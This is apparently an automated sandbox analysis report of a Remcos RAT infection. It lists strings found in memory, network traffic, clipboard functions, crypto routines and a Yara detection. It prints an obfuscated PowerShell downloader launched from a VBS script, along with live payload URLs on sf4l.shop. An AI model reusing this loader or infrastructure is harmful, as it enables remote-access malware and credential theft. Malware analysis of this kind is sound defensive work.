Source: msiexec.exe, msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 0000000D.00000003.1800717874.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1801265819.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800739348.0000000002B3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1800694237.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comppData
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 0000000B.00000002.1811369548.00000000029A2000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: bhv528A.tmp.11.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: bhv528A.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv528A.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv528A.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv528A.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv528A.tmp.11.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv528A.tmp.11.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv528A.tmp.11.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: bhv528A.tmp.11.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv528A.tmp.11.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv528A.tmp.11.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv528A.tmp.11.dr String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
Source: bhv528A.tmp.11.dr String found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
Source: bhv528A.tmp.11.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhv528A.tmp.11.dr String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?69c749c200c753dfb00f5bc8299ab8eb
Source: bhv528A.tmp.11.dr String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?a2555e10569a45fe03b885d268c50da9
Source: bhv528A.tmp.11.dr String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?23ecc2fb73d617d9826364f47d1067db
Source: bhv528A.tmp.11.dr String found in binary or memory: https://fp-as.azureedge.net/apc/trans.gif?7bac4e73e9b20fcc41dc97447167937d
Source: bhv528A.tmp.11.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E55FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhv528A.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
Source: bhv528A.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv528A.tmp.11.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msiexec.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv528A.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv528A.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv528A.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv528A.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv528A.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv528A.tmp.11.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv528A.tmp.11.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1487804584.000001C4E640C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop/
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbP
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop/zWAbmrmP/Diwani.pfbXR
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2646463919.0000000020060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.bin
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sf4l.shop/znUvwLfo/XAManxzmrlwVYAnDZ78.binzw
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv528A.tmp.11.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0041183A OpenClipboard,GetLastError, 11_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 11_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 11_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 12_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 12_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR

System Summary
barindex
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Call Drivhjulenes.ShellExecute(elektrolytterne, Chr(34) & Essayistisk & Chr(34), "", "", Hjlpeprogrammernes)
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00401806 NtdllDefWindowProc_W, 11_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004018C0 NtdllDefWindowProc_W, 11_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004016FD NtdllDefWindowProc_A, 12_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004017B7 NtdllDefWindowProc_A, 12_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402CAC NtdllDefWindowProc_A, 13_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402D66 NtdllDefWindowProc_A, 13_2_00402D66
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAAB79BEA2 2_2_00007FFAAB79BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAAB79B0F6 2_2_00007FFAAB79B0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAAB86926A 2_2_00007FFAAB86926A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFAAB86AB4A 2_2_00007FFAAB86AB4A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04C2EDF0 4_2_04C2EDF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04C2F6C0 4_2_04C2F6C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04C2EAA8 4_2_04C2EAA8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20917194 7_2_20917194
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_2090B5C1 7_2_2090B5C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044B040 11_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0043610D 11_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00447310 11_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044A490 11_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040755A 11_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0043C560 11_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044B610 11_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044D6C0 11_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004476F0 11_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044B870 11_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044081D 11_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00414957 11_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004079EE 11_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00407AEB 11_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044AA80 11_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00412AA9 11_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00404B74 11_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00404B03 11_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044BBD8 11_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00404BE5 11_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00404C76 11_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00415CFE 11_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00416D72 11_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00446D30 11_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00446D8B 11_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00406E8F 11_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00405038 12_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041208C 12_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004050A9 12_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040511A 12_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043C13A 12_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004051AB 12_2_004051AB
